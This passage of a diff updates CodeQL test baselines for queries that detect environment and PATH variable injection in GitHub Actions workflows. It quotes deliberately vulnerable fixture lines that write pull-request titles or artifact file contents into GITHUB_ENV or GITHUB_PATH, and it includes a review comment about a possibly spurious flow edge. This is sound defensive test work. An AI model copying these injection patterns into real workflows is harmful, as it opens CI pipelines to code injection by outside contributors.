github.event.pull_request.title | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | 
semmle.label | echo ${PATHINJ} >> $GITHUB_PATH | | .github/workflows/path1.yml:21:9:25:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/path1.yml:25:9:26:6 | Run Step | semmle.label | Run Step | -| .github/workflows/path1.yml:26:9:29:41 | Run Step | semmle.label | Run Step | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | semmle.label | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 0c4574a77cb..56345ca896a 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected 
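Review bot: The accepted output for EnvPathInjection now contains the edge `path1.yml:21:9:25:6 | Uses Step` → `path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ"`, which looks like an over-approximation being locked into the baseline. The sink text reads only `$PATHINJ`, whose source is already reported separately at line 28 as `github.event.pull_request.title`, whereas the `Uses Step` edge to line 25 is justified by `$(cat foo/bar)` reading a file. path1.yml itself is outside this hunk, so this should be confirmed against the fixture, but if line 29 reads no downloaded file the extra edge means any earlier artifact step taints every later sink. The same edge and a matching `#select` row appear in the new PrivilegedEnvPathInjection.expected; it would be better to tighten the flow step or mark the row as a known false positive before accepting it.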
@@ -1,16 +1,31 @@ edges -| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | -| .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | -| .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | -| .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 
'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes -| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test2.yml:17:9:47:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test2.yml:47:9:52:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| 
.github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | semmle.label | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> 
$GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected new file mode 100644 index 00000000000..2dfa8702d59 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected 
@@ -0,0 +1,26 @@ +edges +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | +nodes +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | semmle.label | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | semmle.label | echo ${PATHINJ} >> $GITHUB_PATH | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | semmle.label | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | 
semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | +subpaths +#select +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref new file mode 100644 index 00000000000..ba2d522c03d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref @@ -0,0 +1 @@ +Security/CWE-077/PrivilegedEnvPathInjection.ql diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index 6dbe7bf3c93..f88785c38e1 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected 
@@ -1,21 +1,40 @@ edges -| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | -| .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | -| .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | -| .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 
'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes -| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test2.yml:17:9:47:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test2.yml:47:9:52:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| 
.github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | semmle.label | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> 
$GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths #select -| .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Run Step | -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | github.event.pull_request.title | -| .github/workflows/test2.yml:47:9:52:6 | Run Step | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:47:9:52:6 | Run Step | Run Step | -| .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | -| .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. 
